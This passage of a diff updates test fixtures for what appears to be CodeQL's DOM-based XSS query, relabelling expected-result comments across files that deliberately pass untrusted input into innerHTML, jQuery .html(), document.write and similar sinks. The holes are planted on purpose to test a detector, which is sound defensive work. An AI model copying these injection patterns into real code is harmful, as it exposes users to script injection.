b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/dragAndDrop.ts @@ -5,14 +5,14 @@ function drop(e) { if (!dataTransfer) return; const text = dataTransfer.getData('text/plain'); - const html = dataTransfer.getData('text/html'); + const html = dataTransfer.getData('text/html'); // $ Source if (!text && !html) return; e.preventDefault(); const div = document.createElement('div'); if (html) { - div.innerHTML = html; // NOT OK + div.innerHTML = html; // $ Alert } else { div.textContent = text; } @@ -21,16 +21,16 @@ function drop(e) { export function install(el: HTMLElement): void { el.addEventListener('drop', (e) => { - $("#id").html(e.dataTransfer.getData('text/html')); // NOT OK + $("#id").html(e.dataTransfer.getData('text/html')); // $ Alert }) } document.addEventListener('drop', (e) => { - $("#id").html(e.dataTransfer.getData('text/html')); // NOT OK + $("#id").html(e.dataTransfer.getData('text/html')); // $ Alert }); $("#foo").bind('drop', (e) => { - $("#id").html(e.originalEvent.dataTransfer.getData('text/html')); // NOT OK + $("#id").html(e.originalEvent.dataTransfer.getData('text/html')); // $ Alert }); (function () { @@ -40,14 +40,14 @@ $("#foo").bind('drop', (e) => { if (!dataTransfer) return; const text = dataTransfer.getData('text/plain'); - const html = dataTransfer.getData('text/html'); + const html = dataTransfer.getData('text/html'); // $ Source if (!text && !html) return; e.preventDefault(); const div = document.createElement('div'); if (html) { - div.innerHTML = html; // NOT OK + div.innerHTML = html; // $ Alert } else { div.textContent = text; } @@ -68,9 +68,9 @@ async function getDropData(e: DragEvent): Promise> { } if (e.dataTransfer.types.includes('text/html')) { - const droppedHtml = e.dataTransfer.getData('text/html'); + const droppedHtml = e.dataTransfer.getData('text/html'); // $ Source const container = document.createElement('html'); - container.innerHTML = droppedHtml; + container.innerHTML = droppedHtml; // $ Alert const imgs = container.getElementsByTagName('img'); if (imgs.length === 1) { const src = imgs[0].src; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/encodeuri.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/encodeuri.js index a48f720bed1a..152a986bbf6e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/encodeuri.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/encodeuri.js @@ -1,4 +1,4 @@ function test() { let loc = window.location.href; - $('click'); // OK + $('click'); } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/event-handler-receiver.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/event-handler-receiver.js index 5b79cfce8993..8eebe40b4179 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/event-handler-receiver.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/event-handler-receiver.js @@ -1,3 +1,3 @@ document.getElementById('my-id').onclick = function() { - this.parentNode.innerHTML = '

    A link

    '; // NOT OK + this.parentNode.innerHTML = '

    A link

    '; // $ Alert }; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/express.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/express.js index cab534d3832c..2d1af9065d35 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/express.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/express.js @@ -3,9 +3,8 @@ var app = express(); import { JSDOM } from "jsdom"; app.get('/some/path', function (req, res) { - // NOT OK - new JSDOM(req.param("wobble"), { runScripts: "dangerously" }); + new JSDOM(req.param("wobble"), { runScripts: "dangerously" }); // $ Alert + - // OK new JSDOM(req.param("wobble"), { runScripts: "outside-only" }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/hana.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/hana.js new file mode 100644 index 000000000000..ef7c9cd71eb1 --- /dev/null +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/hana.js @@ -0,0 +1,93 @@ +const hana = require('@sap/hana-client'); +const express = require('express'); + +const app = express(); +const connectionParams = {}; +const query = ``; +app.post('/documents/find', (req, res) => { + const conn = hana.createConnection(); + conn.connect(connectionParams, (err) => { + conn.exec(query, (err, rows) => { + document.body.innerHTML = rows[0].comment; // $ Alert[js/xss-additional-sources-dom-test] + }); + + const stmt = conn.prepare(query); + stmt.exec([0], (err, rows) => { + document.body.innerHTML = rows[0].comment; // $ Alert[js/xss-additional-sources-dom-test] + }); + stmt.execBatch([[1, "a"], [2, "b"]], function(err, rows) { + document.body.innerHTML = rows[0].comment; // $ Alert[js/xss-additional-sources-dom-test] + }); + stmt.execQuery([100, "a"], function(err, rs) { + document.body.innerHTML = rs[0].comment; // $ Alert[js/xss-additional-sources-dom-test] + }); + }); +}); + +var hdbext = require('@sap/hdbext'); +var express = require('express'); +var dbStream = require('@sap/hana-client/extension/Stream'); + +var app1 = express(); +const hanaConfig = {}; +app1.use(hdbext.middleware(hanaConfig)); + +app1.get('/execute-query', function (req, res) { + var client = req.db; + client.exec(query, function (err, rs) { + document.body.innerHTML = rs[0].comment; // $ Alert[js/xss-additional-sources-dom-test] + }); + + dbStream.createProcStatement(client, query, function (err, stmt) { + stmt.exec({ A: 1, B: 4 }, function (err, params, dummyRows, tablesRows) { + document.body.innerHTML = dummyRows[0].comment; // $ Alert[js/xss-additional-sources-dom-test] + document.body.innerHTML = tablesRows[0].comment; // $ Alert[js/xss-additional-sources-dom-test] + }); + }); + + hdbext.loadProcedure(client, null, query, function(err, sp) { + sp(3, maliciousInput, function(err, parameters, dummyRows, tablesRows) { + document.body.innerHTML = dummyRows[0].comment; // $ Alert[js/xss-additional-sources-dom-test] + document.body.innerHTML = tablesRows[0].comment; // $ Alert[js/xss-additional-sources-dom-test] + }); + }); +}); + + +var hdb = require('hdb'); +const async = require('async'); +const { q } = require('underscore.string'); + +const options = {}; +const app2 = express(); + +app2.post('/documents/find', (req, res) => { + var client = hdb.createClient(options); + + client.connect(function onconnect(err) { + + client.exec(query, function (err, rows) { + document.body.innerHTML = rows[0].comment; // $ Alert[js/xss-additional-sources-dom-test] + }); + client.exec(query, options, function(err, rows) { + document.body.innerHTML = rows[0].comment; // $ Alert[js/xss-additional-sources-dom-test] + }); + + client.prepare(query, function (err, statement){ + statement.exec([1], function (err, rows) { + document.body.innerHTML = rows[0].comment; // $ Alert[js/xss-additional-sources-dom-test] + }); + }); + + client.prepare(query, function(err, statement){ + statement.exec({A: 3, B: 1}, function(err, parameters, dummyRows, tableRows) { + document.body.innerHTML = dummyRows[0].comment; // $ Alert[js/xss-additional-sources-dom-test] + document.body.innerHTML = tableRows[0].comment; // $ Alert[js/xss-additional-sources-dom-test] + }); + }); + + client.execute(query, function(err, rs) { + document.body.innerHTML = rs[0].comment; // $ Alert[js/xss-additional-sources-dom-test] + }); + }); +}); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js index 3369df5dd873..d025ace184c8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jquery.js @@ -1,38 +1,38 @@ function test() { - var tainted = document.location.search + var tainted = document.location.search // $ Source $(tainted); // OK - location.search starts with '?' - $("body", tainted); // OK - $("." + tainted); // OK - $("
    "); // NOT OK - $("body").html("XSS: " + tainted); // NOT OK + $("body", tainted); + $("." + tainted); + $("
    "); // $ Alert + $("body").html("XSS: " + tainted); // $ Alert $(window.location.hash); // OK - location.hash starts with '#' - $("" + location.toString() + ""); // NOT OK + $("" + location.toString() + ""); // $ Alert // Not related to jQuery, but the handling of $() should not affect this sink let elm = document.getElementById('x'); - elm.innerHTML = decodeURIComponent(window.location.hash); // NOT OK - elm.innerHTML = decodeURIComponent(window.location.search); // NOT OK - elm.innerHTML = decodeURIComponent(window.location.toString()); // NOT OK + elm.innerHTML = decodeURIComponent(window.location.hash); // $ Alert + elm.innerHTML = decodeURIComponent(window.location.search); // $ Alert + elm.innerHTML = decodeURIComponent(window.location.toString()); // $ Alert - let hash = window.location.hash; + let hash = window.location.hash; // $ Source $(hash); // OK - start with '#' - $(hash.substring(1)); // NOT OK - $(hash.substring(1, 10)); // NOT OK - $(hash.substr(1)); // NOT OK - $(hash.slice(1)); // NOT OK - $(hash.substring(0, 10)); // OK + $(hash.substring(1)); // $ Alert + $(hash.substring(1, 10)); // $ Alert + $(hash.substr(1)); // $ Alert + $(hash.slice(1)); // $ Alert + $(hash.substring(0, 10)); - $(hash.replace('#', '')); // NOT OK - $(window.location.search.replace('?', '')); // NOT OK - $(hash.replace('!', '')); // OK - $(hash.replace('blah', '')); // OK + $(hash.replace('#', '')); // $ Alert + $(window.location.search.replace('?', '')); // $ Alert + $(hash.replace('!', '')); + $(hash.replace('blah', '')); - $(hash + 'blah'); // OK + $(hash + 'blah'); $('blah' + hash); // OK - does not start with '<' - $('' + hash + ''); // NOT OK + $('' + hash + ''); // $ Alert - $('#foo').replaceWith(tainted); // NOT OK - $('#foo').replaceWith(() => tainted); // NOT OK + $('#foo').replaceWith(tainted); // $ Alert + $('#foo').replaceWith(() => tainted); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx index 85ad5cef8d43..ae373dd4ea96 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/json-stringify.jsx @@ -2,7 +2,7 @@ var express = require("express"); var app = express(); app.get("/some/path", function (req, res) { - const locale = req.param("locale"); + const locale = req.param("locale"); // $ Source const breadcrumbList = [ { "@type": "ListItem", @@ -28,15 +28,15 @@ app.get("/some/path", function (req, res) { }; // OK + }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js index 08183d0db7e3..86b4c3e8d3cb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt-server.js @@ -4,10 +4,9 @@ import jwt from "jsonwebtoken"; import { JSDOM } from "jsdom"; app.get('/some/path', function (req, res) { - var taint = req.param("wobble"); + var taint = req.param("wobble"); // $ Source jwt.verify(taint, 'my-secret-key', function (err, decoded) { - // NOT OK - new JSDOM(decoded.foo, { runScripts: "dangerously" }); + new JSDOM(decoded.foo, { runScripts: "dangerously" }); // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt.js index 7ead302724c3..59e96cb9d11e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/jwt.js @@ -3,5 +3,5 @@ import $ from "jquery" $.post(loginUrl(), {data: "foo"}, (data, xhr) => { var decoded = jwt_decode(data); - $.jGrowl(decoded); // NOT OK - but only flagged with additional sources [INCONSISTENCY] + $.jGrowl(decoded); // $ MISSING: Alert - only flagged with additional sources }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/nodemailer.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/nodemailer.js index 9091f93be7bb..f1fceadbf057 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/nodemailer.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/nodemailer.js @@ -9,7 +9,7 @@ app.post('/private_message', (req, res) => { from: 'webmaster@example.com', to: backend.getUserEmail(req.query.receiver), subject: 'Private message', - text: `Hi, you got a message from someone. ${req.query.message}.`, // OK - html: `Hi, you got a message from someone. ${req.query.message}.`, // NOT OK + text: `Hi, you got a message from someone. ${req.query.message}.`, + html: `Hi, you got a message from someone. ${req.query.message}.`, // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js index e8139936bc78..73088a45b5ef 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/optionalSanitizer.js @@ -1,46 +1,46 @@ function test() { - var target = document.location.search + var target = document.location.search // $ Source - $('myId').html(sanitize ? DOMPurify.sanitize(target) : target); // OK + $('myId').html(sanitize ? DOMPurify.sanitize(target) : target); - $('myId').html(target); // NOT OK + $('myId').html(target); // $ Alert var tainted = target; - $('myId').html(tainted); // NOT OK + $('myId').html(tainted); // $ Alert if (sanitize) { tainted = DOMPurify.sanitize(tainted); } - $('myId').html(tainted); // OK + $('myId').html(tainted); inner(target); function inner(x) { - $('myId').html(x); // NOT OK + $('myId').html(x); // $ Alert if (sanitize) { x = DOMPurify.sanitize(x); } - $('myId').html(x); // OK + $('myId').html(x); } } function badSanitizer() { - var target = document.location.search + var target = document.location.search // $ Source function sanitizeBad(x) { return x; // No sanitization; } var tainted2 = target; - $('myId').html(tainted2); // NOT OK + $('myId').html(tainted2); // $ Alert if (sanitize) { tainted2 = sanitizeBad(tainted2); } - $('myId').html(tainted2); // NOT OK + $('myId').html(tainted2); // $ Alert var tainted3 = target; - $('myId').html(tainted3); // NOT OK + $('myId').html(tainted3); // $ Alert if (sanitize) { tainted3 = sanitizeBad(tainted3); } - $('myId').html(tainted3); // NOT OK + $('myId').html(tainted3); // $ Alert - $('myId').html(sanitize ? sanitizeBad(target) : target); // NOT OK + $('myId').html(sanitize ? sanitizeBad(target) : target); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx index 66b7d65f669b..69f66f07aa44 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/pages/[id].jsx @@ -2,18 +2,18 @@ import { useRouter } from 'next/router' export default function Post(params) { const router = useRouter() - const { id } = router.query + const { id } = router.query // $ Source return ( <>
    ) @@ -22,8 +22,8 @@ export default function Post(params) { export async function getServerSideProps(context) { return { props: { - id: context.params.id || "", - q: context.query?.foobar || "", + id: context.params.id || "", // $ Source + q: context.query?.foobar || "", // $ Source } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js index 318007dacfa0..432c9910a2d7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-native.js @@ -4,7 +4,7 @@ import { WebView } from 'react-native'; var app = express(); app.get('/some/path', function(req, res) { - let tainted = req.param("code"); - ; // NOT OK - ; // NOT OK + let tainted = req.param("code"); // $ Source + ; // $ Alert + ; // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-context.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-context.js index 6d7e20ec6eb8..3811c6b2c964 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-context.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-context.js @@ -7,13 +7,13 @@ function useMyContext() { export function useDoc1() { let { root } = useMyContext(); - root.appendChild(window.name); // NOT OK + root.appendChild(window.name); // $ Alert } class C extends Component { foo() { let { root } = this.context; - root.appendChild(window.name); // NOT OK + root.appendChild(window.name); // $ Alert } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-router.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-router.js index 49d66634e5af..472f2026f1db 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-router.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-router.js @@ -5,13 +5,13 @@ export function nextRouter() { return (
    { - router.push(router.query.foobar) // NOT OK + router.push(router.query.foobar) // $ Alert }}>Click to XSS 1 { - router.replace(router.query.foobar) // NOT OK + router.replace(router.query.foobar) // $ Alert }}>Click to XSS 2 { - router.push('/?foobar=' + router.query.foobar) // OK + router.push('/?foobar=' + router.query.foobar) }}>Safe Link
    ) @@ -20,7 +20,7 @@ export function nextRouter() { import { withRouter } from 'next/router' function Page({ router }) { - return router.push(router.query.foobar)}>Click to XSS 3 // NOT OK + return router.push(router.query.foobar)}>Click to XSS 3 // $ Alert } export const pageWithRouter = withRouter(Page); @@ -30,7 +30,7 @@ export function nextRouterWithLib() { return (
    { - router.push(router.query.foobar) // NOT OK + router.push(router.query.foobar) // $ Alert }}>Click to XSS 1
    ) diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js index 672cd3bd6898..2dbc2feb38fa 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/react-use-state.js @@ -1,33 +1,33 @@ import { useState } from 'react'; function initialState() { - let [state, setState] = useState(window.name); - return
    ; // NOT OK + let [state, setState] = useState(window.name); // $ Source + return
    ; // $ Alert } function setStateValue() { let [state, setState] = useState('foo'); - setState(window.name); - return
    ; // NOT OK + setState(window.name); // $ Source + return
    ; // $ Alert } function setStateValueLazy() { let [state, setState] = useState('foo'); - setState(() => window.name); - return
    ; // NOT OK + setState(() => window.name); // $ Source + return
    ; // $ Alert } function setStateValueLazy() { let [state, setState] = useState('foo'); setState(prev => { - document.body.innerHTML = prev; // NOT OK + document.body.innerHTML = prev; // $ Alert }) - setState(() => window.name); + setState(() => window.name); // $ Source } function setStateValueSafe() { let [state, setState] = useState('foo'); setState('safe'); setState(() => 'also safe'); - return
    ; // OK + return
    ; } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js index 9d9fe6c80c97..52ad850e0185 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/sanitiser.js @@ -13,37 +13,37 @@ function escapeAttr(s) { } function test() { - var tainted = window.name; + var tainted = window.name; // $ Source var elt = document.createElement(); - elt.innerHTML = "" + escapeHtml(tainted) + ""; // OK - elt.innerHTML = "
    " + escapeAttr(tainted) + "
    "; // NOT OK, but not flagged - [INCONSISTENCY] + elt.innerHTML = "" + escapeHtml(tainted) + ""; + elt.innerHTML = "
    " + escapeAttr(tainted) + "
    "; // $ MISSING: Alert - not flagged - const regex = /[<>'"&]/; if (regex.test(tainted)) { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } else { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } if (!regex.test(tainted)) { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } else { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } if (regex.exec(tainted)) { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } else { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } if (regex.exec(tainted) != null) { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } else { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } if (regex.exec(tainted) == null) { - elt.innerHTML = '' + tainted + ''; // OK + elt.innerHTML = '' + tainted + ''; } else { - elt.innerHTML = '' + tainted + ''; // NOT OK + elt.innerHTML = '' + tainted + ''; // $ Alert } - elt.innerHTML = tainted.replace(/<\w+/g, ''); // NOT OK + elt.innerHTML = tainted.replace(/<\w+/g, ''); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js index 6c13ae8cc3e2..aadec44a9dfb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/stored-xss.js @@ -1,30 +1,30 @@ (function() { - sessionStorage.setItem('session', document.location.search); - localStorage.setItem('local', document.location.search); + sessionStorage.setItem('session', document.location.search); // $ Source + localStorage.setItem('local', document.location.search); // $ Source - $('myId').html(sessionStorage.getItem('session')); // NOT OK - $('myId').html(localStorage.getItem('session')); // OK - $('myId').html(sessionStorage.getItem('local')); // OK - $('myId').html(localStorage.getItem('local')); // NOT OK + $('myId').html(sessionStorage.getItem('session')); // $ Alert + $('myId').html(localStorage.getItem('session')); + $('myId').html(sessionStorage.getItem('local')); + $('myId').html(localStorage.getItem('local')); // $ Alert var href = localStorage.getItem('local'); - $('myId').html("foobar"); // NOT OK + $('myId').html("foobar"); // $ Alert if (href.indexOf("\"") !== -1) { return; } - $('myId').html(""); // OK + $('myId').html(""); var href2 = localStorage.getItem('local'); if (href2.indexOf("\"") !== -1) { return; } - $('myId').html("\nfoobar"); // OK + $('myId').html("\n    foobar"); var href3 = localStorage.getItem('local'); if (href3.indexOf("\"") !== -1) { return; } - $('myId').html('\r\n' + "something" + ''); // OK + $('myId').html('\r\n' + "something" + ''); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/string-manipulations.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/string-manipulations.js index 91e122dee0f5..895970f2b735 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/string-manipulations.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/string-manipulations.js @@ -1,12 +1,12 @@ -document.write(document.location.href.charCodeAt(0)); // OK +document.write(document.location.href.charCodeAt(0)); -document.write(document.location); // NOT OK -document.write(document.location.href); // NOT OK -document.write(document.location.href.valueOf()); // NOT OK -document.write(document.location.href.sup()); // NOT OK -document.write(document.location.href.toUpperCase()); // NOT OK -document.write(document.location.href.trimLeft()); // NOT OK -document.write(String.fromCharCode(document.location.href)); // NOT OK -document.write(String(document.location.href)); // NOT OK -document.write(escape(document.location.href)); // OK (for now) -document.write(escape(escape(escape(document.location.href)))); // OK (for now) +document.write(document.location); // $ Alert +document.write(document.location.href); // $ Alert +document.write(document.location.href.valueOf()); // $ Alert +document.write(document.location.href.sup()); // $ Alert +document.write(document.location.href.toUpperCase()); // $ Alert +document.write(document.location.href.trimLeft()); // $ Alert +document.write(String.fromCharCode(document.location.href)); // $ Alert +document.write(String(document.location.href)); // $ Alert +document.write(escape(document.location.href)); +document.write(escape(escape(escape(document.location.href)))); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js index a1feef0267a0..7b0e5c4be3a0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tainted-url-suffix-arguments.js @@ -2,12 +2,12 @@ import 'dummy'; function foo(x, y, z) { arguments; // ensure 'arguments' are used - document.writeln(x); // OK - document.writeln(y); // NOT OK - document.writeln(z); // OK + document.writeln(x); + document.writeln(y); // $ Alert + document.writeln(z); } function bar() { - const url = window.location.href; + const url = window.location.href; // $ Source foo('safe', url, 'safe'); } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx index d030b30b1390..7675513734da 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tooltip.jsx @@ -3,22 +3,22 @@ import ReactDOM from 'react-dom'; import ReactTooltip from 'react-tooltip'; function tooltips() { - const source = window.name; + const source = window.name; // $ Source return - // OK - // OK - // NOT OK - // NOT OK + + + { /* $ Alert */ } + { /* $ Alert */ } } function MyElement(props) { const provide = props.provide; - return
    ; // NOT OK + return
    ; // $ Alert } function useMyElement() { - const source = window.name; + const source = window.name; // $ Source return source} />; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js index 43ab0a02cf27..11adc4399376 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/translate.js @@ -3,10 +3,9 @@ "own goal": "backpass", "fumble": "feint" }; - var target = document.location.search + var target = document.location.search // $ Source var searchParams = new URLSearchParams(target.substring(1)); - // NOT OK - $('original-term').html(searchParams.get('term')); - // OK + $('original-term').html(searchParams.get('term')); // $ Alert + $('translated-term').html(translate[searchParams.get('term')]); })(); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types-lib.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types-lib.js index 75137f7de5ce..61a272dffe1a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types-lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types-lib.js @@ -1,3 +1,3 @@ export function createHtml(x) { - return x; + return x; // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js index 7702768d6039..247fbe3315fb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/trusted-types.js @@ -1,13 +1,13 @@ import * as lib from './trusted-types-lib'; -const policy1 = trustedTypes.createPolicy('x', { createHTML: x => x }); // NOT OK -policy1.createHTML(window.name); +const policy1 = trustedTypes.createPolicy('x', { createHTML: x => x }); // $ Alert +policy1.createHTML(window.name); // $ Source -const policy2 = trustedTypes.createPolicy('x', { createHTML: x => 'safe' }); // OK +const policy2 = trustedTypes.createPolicy('x', { createHTML: x => 'safe' }); policy2.createHTML(window.name); -const policy3 = trustedTypes.createPolicy('x', { createHTML: x => x }); // OK +const policy3 = trustedTypes.createPolicy('x', { createHTML: x => x }); policy3.createHTML('safe'); const policy4 = trustedTypes.createPolicy('x', { createHTML: lib.createHtml }); -policy4.createHTML(window.name); +policy4.createHTML(window.name); // $ Source diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js index fea2063a4e3a..0ecc2535272d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst.js @@ -1,172 +1,156 @@ function test() { - var target = document.location.search + var target = document.location.search // $ Source - // NOT OK - $('myId').html(target) + $('myId').html(target) // $ Alert - // NOT OK - document.write(""); + document.write(""); // $ Alert document.write(""); - // NOT OK - $('
    '); + $('
    '); // $ Alert - $('
    '); // OK - $('
    '); // OK + $('
    '); + $('
    '); - let params = (new URL(document.location)).searchParams; - $('name').html(params.get('name')); // NOT OK + let params = (new URL(document.location)).searchParams; // $ Source + $('name').html(params.get('name')); // $ Alert var searchParams = new URLSearchParams(target.substring(1)); - $('name').html(searchParams.get('name')); // NOT OK + $('name').html(searchParams.get('name')); // $ Alert } function foo(target) { - // NOT OK - $('myId').html(target); + $('myId').html(target); // $ Alert } -foo(document.location.search); +foo(document.location.search); // $ Source function bar() { - return document.location.search; + return document.location.search; // $ Source } -// NOT OK -$('myId').html(bar()); +$('myId').html(bar()); // $ Alert function baz(x) { return x; } -// NOT OK -$('myId').html(baz(document.location.search)); +$('myId').html(baz(document.location.search)); // $ Alert function wrap(s) { return "
    " + s + "
    "; } -// NOT OK -$('myId').html(wrap(document.location.search)); +$('myId').html(wrap(document.location.search)); // $ Alert function chop(s) { if (s) return s.substr(1); return ""; } -// NOT OK -$('myId').html(chop(document.location.search)); -// NOT OK (duplicated to test precision of flow tracking) -$('myId').html(chop(document.location.search)); -// NOT OK -$('myId').html(wrap(chop(bar()))); +$('myId').html(chop(document.location.search)); // $ Alert +$('myId').html(chop(document.location.search)); // $ Alert - duplicated to test precision of flow tracking +$('myId').html(wrap(chop(bar()))); // $ Alert function dangerouslySetInnerHtml(s) { - // NOT OK - $('myId').html(s); + $('myId').html(s); // $ Alert } -dangerouslySetInnerHtml(document.location.search); -dangerouslySetInnerHtml(document.location.search); +dangerouslySetInnerHtml(document.location.search); // $ Source +dangerouslySetInnerHtml(document.location.search); // $ Source -// NOT OK -$('myId').html(bar()); +$('myId').html(bar()); // $ Alert -[,document.location.search].forEach(function(x) { +[,document.location.search].forEach(function(x) { // $ Source if (x) - // NOT OK - $('myId').html(x); + $('myId').html(x); // $ Alert }); -// NOT OK -let s = ; +let s = ; // $ Alert angular.module('myApp', []) .service("myService", function($sce, $other) { - $sce.trustAsHtml(document.location.search); // NOT OK - $sce.trustAsCss(document.location.search); // NOT OK - 